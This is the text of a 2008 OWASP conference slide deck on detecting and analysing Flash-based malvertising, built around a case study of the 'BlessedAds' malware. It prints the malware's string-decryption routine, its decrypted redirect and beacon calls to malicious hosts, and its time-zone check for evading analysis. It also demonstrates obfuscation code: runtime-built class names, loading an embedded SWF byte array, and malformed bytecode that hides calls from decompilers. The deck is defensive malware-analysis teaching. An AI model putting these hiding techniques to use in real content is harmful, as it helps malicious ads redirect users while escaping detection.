1. Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org OWASP Asia Pacific Conference 2008 The Detection and Analysis of Flash Based Malware Paul Theriault Senior Associate - SIFT paul.theriault@sift.com.au Feb 2008

2. OWASP About me  Paul Theriault  Security consultant with SIFT (www.sift.com.au)www.sift.com.au  Web app penetration tester  Code review and developer training  Security researcher

3. OWASP Background  Flash is a commonly used format for rich media on the internet  Flash “Movies” aren’t really movies  Application byte-code to be executed by the flash player runtime environment  Many websites accept third-party flash content  Advertising Networks  Gaming Websites (Kongregate, Newgrounds…)  Graphic Design/Art sites (Flash Kit, Deviantart…)  Others: any forum with SWF avatars etc.  3 rd Party Flash movies may contain malicious code  How can you tell?

4. OWASP Talk Outline 1.Flash based malware  Background  Introduction to malware case study 2.Analysis Methods  Disassembly  Decompiling  Runtime Analysis 3.Counter Analysis Methods  Obfuscation & Stack Manipulation  Dynamically Loading Content

5. OWASP Flash Advertising  Flash has become a common format for web advertisements  Advertising organisation must accept third-party content which may be malicious  Attacker only needs to achieve redirection of user to malicious site – and Ads are supposed to redirect users!  Ads are also often allowed to contact third-party servers for tracking purposes

6. OWASP Rise in “Malvertising”  Malvertising: spreading malware by convincing sites to host malicious advertisements  http://isc.sans.org/diary.html?storyid=3727 http://isc.sans.org/diary.html?storyid=3727  Major advertising organisations affected  Typical method is to force victim to malicious website  Old problem, new(ish) vector:  http://msmvps.com/spywaresucks http://msmvps.com/spywaresucks  www.mikeonads.com www.mikeonads.com

7. OWASP “SkyAuction/BlessedAds/Errorsafe” Malware  Seen since March 2007 across many organisations  Gained widespread media attention in November with major internet properties affected  Fictitious flash advertisement which redirects visitor to malicious website without user interaction  Note:  Flash file doesn’t exploit any vulnerability  Used encryption and obfuscated programming techniques to hide function calls and urls

8. OWASP Analysis Methods

9. OWASP Analysis of Flash Content  Flash Overview  Static Analysis  Bytecode level analysis  Actionscript Analysis  Focus on ActionScript portions of SWF file  Runtime Analysis

10. OWASP SWF Introduction

11. OWASP SWF Format  SWF Format  Contains images, sounds, video clips AND ActionScript bytecode (ABC) in series of tagged data blocks: File Attributes Tag End TagHeader …  2 Types of Tags: Definition & Control  Definition: defines content – shapes, texts, sounds, script etc. and assign them a character ID.  Control: Manipulate instances of content (instances of characters) and control flow of the file  Complete specification for SWF format available from:  http://www.adobe.com/licensing/developer/ http://www.adobe.com/licensing/developer/  (requires registration)

12. OWASP ActionScript Overview  Focus on the Tags that contain ActionScript  AS3: DoABC  AS2: DoAction, DoInitAction, DefineButton2  ActionScript Byte Code  Sequence of actions on the virtual machine state  Specification for AVM2 bytecode here: http://www.adobe.com/devnet/actionscript/articles/avm2overview.pdf http://www.adobe.com/devnet/actionscript/articles/avm2overview.pdf

13. OWASP ActionScript Overview

14. OWASP Tools for static analysis  Hex Editor  Flasm  ActionScript bytecode assembler/disassembler  SWFMILL  Converts swf to xml and vice versa  ActionScript Decompiler  Flare (AS2)  AVMPlus (AS3) – compiled from Tamarin  https://www.flashsec.org/wiki/Simple_AS3_Decompiler_Usin g_Tamarin https://www.flashsec.org/wiki/Simple_AS3_Decompiler_Usin g_Tamarin

15. OWASP SWF Deconstructed ActionScript var url = 'http://www.sift.com.au'; getURL(url, '_self'); FLASM frame 0 constants 'url', 'http://www.sift.com.au', '_self' push c:0, c:1 varEquals push c:0 getVariable push c:2 getURL2 end // of frame 0 SWF 46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 3C 00 00 00 88 21 00 03 00 75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00 96 04 00 08 00 08 01 3C 96 02 00 08 00 1C 96 02 00 08 02 9A 01 00 00 00 40 00 00 00... XML

16. OWASP SWF Deconstructed ActionScript var url = 'http://www.sift.com.au'; getURL(url, '_self');

17. OWASP SWF Deconstructed FLASM frame 0 constants 'url', 'http://www.sift.com.au', '_self' push c:0, c:1 varEquals push c:0 getVariable push c:2 getURL2 end // of frame 0 {“http://www.sift.com.au”, “url”} {} {“http://www.sift.com.au”} {_self,http://www.sift.com.au} {“url”}

18. OWASP SWF Deconstructed XML...

19. OWASP SWF Deconstructed SWF 46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 3C 00 00 00 88 21 00 03 00 75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00 96 04 00 08 00 08 01 3C 96 02 00 08 00 1C 96 02 00 08 02 9A 01 00 00 00 40 00 00 00

20. OWASP SWF Deconstructed ActionScript var url = 'http://www.sift.com.au'; getURL(url, '_self'); FLASM frame 0 constants 'url', 'http://www.sift.com.au', '_self' push c:0, c:1 varEquals push c:0 getVariable push c:2 getURL2 end // of frame 0 SWF 46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 3C 00 00 00 88 21 00 03 00 75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00 96 04 00 08 00 08 01 3C 96 02 00 08 00 1C 96 02 00 08 02 9A 01 00 00 00 40 00 00 00... XML

21. OWASP Byte code analysis  SWF are usually compressed  Look at first 3 bytes  CWS= compressed  FWS= non-compressed  Use ‘flasm –x movie.swf’ to decompress  Open SWF in Hex editor  Some unusual strings  Difficult to read in this format

22. OWASP SWFmill  Available from http://swfmill.orghttp://swfmill.org  Converts SWF into xml (and xml to SWF)  Much easier to read than HEX  But very large files  50k malware  6000 line xml  Includes graphic data  Less information than decompiling, but more resilient to obfuscation

23. OWASP SWFmill  Constants pool from malware  Difficult to determine where its used in this view

24. OWASP FLASM  FLASM is a ABC disassembler  Available from http://www.nowrap.de/flasm.html http://www.nowrap.de/flasm.html  Describe the actionscript present in the SWF file in terms of Virtual Machine actions: push, pop, add, callmethod, jump etc.  FLASM provides lower level analysis, helps with understanding exactly what is going on inside AVM

25. OWASP FLASM analysis  Looking at the “Constants Pool” in the malware: constants '_root', 'c1', '47ED02', 'c2', '46E91A247C', 'c3', '7FF817257C8DF8', 'c4', '50E70523', 'c5', '7FD7153B7080E795EA776F', 'c6', '48FC022723CCA3A8F36070509F2105CBA738D20F50A22FD09E2BB74956 972D2F50252B6269', 'c7', '11', 'c8', '10', 'c9', 'c10', 'c11', 'c12', '17', 'c13', '48FC022723CCA3', 'c14', 'c15', '0DB1', 'c16', 'c17', '48FC022723CCA3A7E67676518C201D9BA138D20F50A263C7922FAD031 B923C634721342266E62EB8CBB7746D368E0268C2', 'c18', '14B8', 'c19', '4DE905237C91BCA4F66B774FC274559DE42686', 'c20', '0F', 'c21', '18BE426729D3BCFA', 'c22', '7FD7022D', 'c23', '7FFD043B', 'c24', '53FD14246D91', 'c25', '7FD7102363', 'c26', '7FD7103B6F', 'c27', '7FD710347188', 'c28', '53ED1833', 'c29', '47ED0203708EE9B0F06B666C9C2317CAA0', 'String', 'prototype', 'color', 'eslogan', 'result', '', 'n', 'this', 'length', 'slice', 'parseInt', 'fromCharCode', '_visible', 'getNextHighestDepth', 'emc', 'createEmptyMovieClip', 'u', 'dt', 'getTime', 'loadVariables', 'i', 'setInterval', 'stats', 'clearInterval', 'LoadVars', 'so', 'SharedObject', 'getLocal', 'data', 'uzhe', 'exp', 'Date', 'cr', 'expires', 'flush', 'lim', 'r', 'view'  Looks a bit fishy…

26. OWASP FLASM analysis  Can also see where its called: push 3, 0.0, 'LoadVars' new push 14688422, 1, r:1, 'c28' getMember push 'color' callMethod  Calling a function called ‘color’ prior to calling LoadVars

27. OWASP ActionScript Analysis  FLARE (http://www.nowrap.de/flare.html)http://www.nowrap.de/flare.html  Decompiles SWF (AS2 only) files to ActionScript  Manually trace ActionScript for malicious behaviour  Functions which connect remotely  Look for strange behaviours  Provides much better view of what is going on

28. OWASP ActionScript Analysis  Examine where the strange strings are assigned: _root.c1 = '47ED02'; _root.c2 = '46E91A247C'; _root.c3 = '7FF817257C8DF8'; _root.c4 = '50E70523'; _root.c5 = '7FD7153B7080E795EA776F'; _root.c6 = '48FC022723CCA3A8F36070509F2105CBA738D20F5…  Now searching for where they are used: (new LoadVars())[v1.c28.color(14688422)](v1.c6.color(14688422), v1.c3.color(14688422), v1.c4.color(14688422));  So we know it is opening a location, but where?

29. OWASP ActionScript Analysis  The String.Color() function is actually a decryption method: String.prototype.color = function (eslogan) { var v3 = eslogan; var result = ''; var v1; var n; var v2; v1 = 0; n = this.length; while (v1 < n) { v2 = parseInt(this.slice(v1, v1 + 2), 16) ^ v3 >> 8 & 255; if (v2 > 127) { v2 += 848;} result += String.fromCharCode(v2); v3 = (v3 * 52845 + 22719) % 16777215; v1 += 2; } return result; }; Decryption Key

30. OWASP ActionScript Analysis  Compile and run decryption algorithm across the mystery variables: c1:getc11:0c22:__tz c2:falsec12:7c23:_url c3:_parentc13:http://c24:substr c4:postc14:0c25:__ftz c5:__click_urlc15:-9c26:__flv c6:http://blessedads.com/? cmpid=master0n c16:0c27:__fchk c7:1c17:http://mysurvey4u.com /stats.php?campaign=mast er0n c28:send c8:0c18:40c29:getTimezoneOffset c9:0c19:master0nintl8112007 c10:1c20:/

31. OWASP ActionScript Analysis  Substituting these decrypted strings back into the original file reveals calls: v1.emc.loadVariables("http://mysurvey4u.com/stats.php?campaign=m aster0n", "get"); new LoadVars())["send"]("http://blessedads.com/?cmpid=master0n", “_parent”,”post”);

32. OWASP Interesting Classes and Functions (AS2)  Global Functions  asfunction, ASnative, chr, escape, eval, fscommand, getTimer, getURL, loadMovie, loadMovieNum, loadVariables, mbchr, mbord, mbsubstring, MMExecute, setInterval, setTimeout, unescape  Global Properties  _global, _level, _root  Classes  System.capabilities, ExternalInterface, LoadVars, LocalConnection, MovieClipLoader, NetConnection, NetStream, System.security, XML, XMLSocket  Functions  XML.load, StyleSheet.load, LoadVars.load, LoadVars.send, LocalConnection.send, PrintJob.send, XML.send, XMLSocket.send, XML.sendAndLoad, LoadVars.sendAndLoad, FileReference.upload, FileReference.download

33. OWASP Interesting Classes and Functions (AS3)  Classes  flash.display.Loader, flash.external.ExternalInterface, flash.media.Sound, flash.media.flash.media.Video, flash.net.LocalConnection, flash.net.NetConnection, flash.net.NetStream, flash.net.SharedObject, flash.net.Socket, flash.net.URLLoader, flash.net.URLRequest, flash.net.URLStream, flash.net.XMLSocket, flash.system.Security, flash.system.LoaderContext, flash.utils.ByteArray, flash.utils.Timer  Functions  flash.net.navigateToURL, flash.net.sendToURL, flash.net.registerClassAlias, flash.system.fscommand, flash.utils.setInterval, flash.utils.setTimeout, flash.utils.getDefinitionByName, flash.utils.getQualifiedClassName, flash.utils.getQualifiedSuperclassName, flash.utils.getTimer, flash.utils.unescapeMultiByte

34. OWASP Runtime Analysis  Load the file, use proxy to observe (and limit!) network interactions  Obviously better to do this on isolated test machine  This malware tries to evade dynamic analysis  Only connects to malicious website when Movie is loaded via http, AND Local time is a specific value: _root["__tz"] = -(new Date())["getTimeZoneOffset"]() / 60; if (_root["_url"]["substr"](parseInt(0), parseInt(7)) == "http://") && !(_root["__tz"] >= -9 && _root["__tz"] <= 0))) {

35. OWASP Advanced Runtime Analysis via debugger  Many debug tools are available for flash:  fdb (http://labs.adobe.com/technologies/flex/sdk/)http://labs.adobe.com/technologies/flex/sdk/  Ofd-net (ALPHA - http://sourceforge.net/projects/ofd-net )http://sourceforge.net/projects/ofd-net  Requires Debug Flash player  http://www.adobe.com/support/flashplayer/downloads.html http://www.adobe.com/support/flashplayer/downloads.html  For 3 rd party SWF, where do you get debug file (SWD)?  “swf2swd.exe” from Nikos Kastellanos (ofd-net author, above url)  Also need to enable debugging:  UnlockSWF (http://www.buraks.com/unlockswf/)http://www.buraks.com/unlockswf/  However, swf2swd has problems with malformed flash files… work required to develop a robust SWD extractor

36. OWASP Runtime Analysis  Issues with Runtime Analysis  Difficult to automate  Have to execute potential dangerous code  Relies on observing external interactions (until debugging tools are more mature)  Other Runtime Analysis tools  SWFIntruder  https://www.owasp.org/index.php/Category:SWFIntruder https://www.owasp.org/index.php/Category:SWFIntruder  Erlswf  http://pentaphase.de/index.php?/archives/29-Erlang- unscrables-SWF.html http://pentaphase.de/index.php?/archives/29-Erlang- unscrables-SWF.html

37. OWASP Counter Analysis Methods

38. OWASP Counter-Analysis  Create Class and function names at runtime  Embedding code at runtime  Code Obfuscation

39. OWASP Class names at runtime  Basic static analysis relies on locating key function and class names  Classes can be instanced from strings using:  AS2: var myClass = _global['LoadVars'];  AS3: var ClassReference:Class = getDefinitionByName("flash.display.Loader") as Class;  For example: var f=String.fromCharCode var a=f(76); a+=f(111); a+=f(97); a+=f(100); a+=f(86); a+=f(97); a+=f(114); a+=f(115); (new _global[a]()).send('http://www.sift.com.au', '_parent', 'post');

40. OWASP Function Names At Runtime  Works for function names too: var v3 = chr(103) + (chr(101) + (chr(116) + (chr(85) + (chr(82) + chr(76))))); _root[v3]('http://www.sift.com.au', '_parent', 'post');  String ‘GetURL’ no longer in the file

41. OWASP ASnative  ASnative is an undocumented function  Call AS2 functions using reference numbers, as if all functions exist in a spreadsheet  Can be used instead of the real function names  var escapeFunction=_global["ASnative"](100, 0);  Examples:  ASnative(253, 7) - [_global] XML  ASnative(301, 0) - [XML.prototype] load  ASnative(100, 0) - [_global] escape  http://osflash.org/flashcoders/undocumented/asnative http://osflash.org/flashcoders/undocumented/asnative

42. OWASP Embedding Code  Another method of hiding code is to load the malicious code at runtime  However loading code from external site is obvious to runtime analysis  Alternative is to embed data within the file and load at runtime  One way to achieve this is to use the Display.Loader.LoadBytes() method

43. OWASP Embedding code loader=new Loader(); configureListeners(loader.contentLoaderInfo); //create an byteArray containing our malicious swf var ba:ByteArray=new ByteArray(); var badware:Array= [67,87,83,7,195,3,0,0,120,218,124,83,203,110,19,49,20,189,227,73,51,78,67,83,154,20,166,145,42,145,93,137,64,176,200,10,197,111,0,71,6,180,201,26,91,33,15,216, 6, … 181,186,125,16,51,47,221,254,62,234,103,81,111,71,62,24,123,243,150,44,173,76,1 37,178,196,28,218,112,138,211,159,0,0,0,255,255,3,0,4,45,181,29]; for(var i:int=0;i<badware.length;i++) { ba.writeByte(badware[i]); } //load the swf loader.loadBytes(ba);

44. OWASP Embedding code  Only remaining evidence is  Use of loader class  Pushing a massive array on the stack  Hiding the use of the Loader class  Use dynamic class creation as discussed previously  Hiding the data  Encrypt/Encode values  Embed the values in an image (could also use steganography techniques)

45. OWASP Obfuscation  Many techniques available from efforts to secure flash movie source code  ActionScript obfuscation  Bytecode obfuscation  ActionScript Obfuscation  Use confusing variable names – numbers and non- displayable characters

46. OWASP Bytecode obfuscation  Flash AVM executes bytecodes one by one, whereas decompiler breaks the bytecode into meaningful pieces  We can exploit this to confuse decompilers  The malicious script we want to hide: var foo="getURL"; _root[foo]('http://www.sift.com.au', '_parent', 'post');

47. OWASP Bytecode obfuscation  Converted to action records this becomes constants 'foo', 'getURL', 'post', '_parent', 'http://www.sift.com.au', '_root' push 'foo', 'getURL' varEquals push 'post', '_parent', 'http://www.sift.com.au', 3, '_root' getVariable push 'foo' getVariable callMethod pop

48. OWASP Bytecode obfuscation  Using a malformed push record, we hide the data from decompilers : push ‘junk’ label1: constants 'foo', 'getURL', 'post', '_parent', 'http://www.sift.com.au', '_root' push 'foo', 'getURL' varEquals push 'post', '_parent', 'http://www.sift.com.au', 3, '_root' getVariable push 'foo' getVariable callMethod pop branch label2 branch label1 label2: Manually change the size of this “push”

49. OWASP Bytecode Obfuscation SWF (Unaffected) 46 57 53 08 95 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 6B 00 00 00 96 61 00 17 88 37 00 06 00 66 6F 6F 00 67 65 74 55 52 4C 00 70 6F 73 74 00 5F 70 61 72 65 6E 74 00 68 74 74 70 3A 2F 2F 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 72 6F 6F 74 00 96 04 00 08 00 08 01 3C 96 0D 00 08 02 08 03 08 04 07 03 00 00 00 08 05 1C 96 02 00 08 00 1C 52 17 99 02 00 05 00 99 02 00 9B FF 17 … (Error, but Successful) XML FLASM frame 0 push ??? // unknown push type 23: rest of push skipped label1: // Wild label in the middle of an action, now placed before next action branch label1 pop end // of frame 0 ActionScript

50. OWASP Bytecode Obfuscation  This obfuscation technique is documented: http://www.gotoandplay.it/_articles/2004/04/swfProtection.php http://www.gotoandplay.it/_articles/2004/04/swfProtection.php  Not a new technique, but example has been seen in the wild.  The malware author read this article!  The Blessads malware contains strings used in one of the examples on this page  Some tools will detect these obfuscations (e.g. Manitu ASV)

51. OWASP Obfuscation seen in the wild  Flare Decompile of diepress.com malware  http://msmvps.com/blogs/spywaresucks/archive/2008/01/19/1469617.aspx http://msmvps.com/blogs/spywaresucks/archive/2008/01/19/1469617.aspx // unknown tag 255 length 1 // unknown tag 777 length 3 movieClip 4680 { #initclip function () { for (;;) { return (164 % 511) * 5; var = -785 + (); for (;;) {

52. OWASP Goal of Analysis  Analysis to achieve detection  Reduce the risk that malicious content is served by your organisation  Large reputational impact if malware is even associated with your organisation  Limitations:  Ad click through targets are controlled by third parties. Cannot prevent attacker modifying the target site to be malicious.  Same issue if third party interactions are allowed in the background

53. OWASP Addressing the risk  Contractual Controls  “Terms of use” approach  Complicated chain of supply - federated ads  Reactive Controls  Mechanism for users to report malicious ads  Effective incident response program  Technical Controls  Need to determine exact program functionality  Signal detection problem – malicious ads can be very similar to legitimate ads

54. OWASP What about volume?  Even basic obfuscation results in very time consuming manual analysis  Advertising organisations are dealing with thousands of campaigns, each with their own creatives  Questions to ask:  Why would an legitimate add use obfuscation?  Why would a legitimate add call certain function calls or class names?  Can use automated approach to find suspicious files to be marked for further analysis.

55. OWASP Recommendations  Develop combination of automated and manual analysis procedures to increase detection of malicious advertisements  Use ad templates to restrict available functionality and make analysis easier  Require 3 rd party to provide source code  Implement good incident detection and response processes

56. OWASP Questions? ?

57. OWASP SIFT Pty Ltd – Australia The detection and analysis of Flash based malware Paul Theriault [paul.theriault@sift.com.au]